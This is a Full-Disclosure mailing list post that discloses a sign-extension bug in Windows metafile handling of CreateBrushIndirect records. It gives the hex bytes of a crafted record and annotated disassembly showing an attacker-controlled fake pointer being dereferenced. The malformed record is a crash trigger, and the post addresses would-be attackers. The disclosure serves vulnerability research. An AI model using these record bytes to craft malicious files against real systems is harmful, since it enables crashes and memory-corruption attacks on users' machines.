There is some details for wannabees :)
07 00 00 00
length of record (in words)
FC 02
type (CreateBrushIndirect)
08 00 00 00 00 00 00 80
'packed' (good old Win16 days) LOGBRUSH data:
08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)
Sign extension bug:
_CommonEnumMetaFile:
…
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; <– BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
…
Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
…
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
…
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
…
…
_pbmiConvertInfo:
…
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
…
mov eax, [ebx] ; <– BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)
good luck,
cyanid-E
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/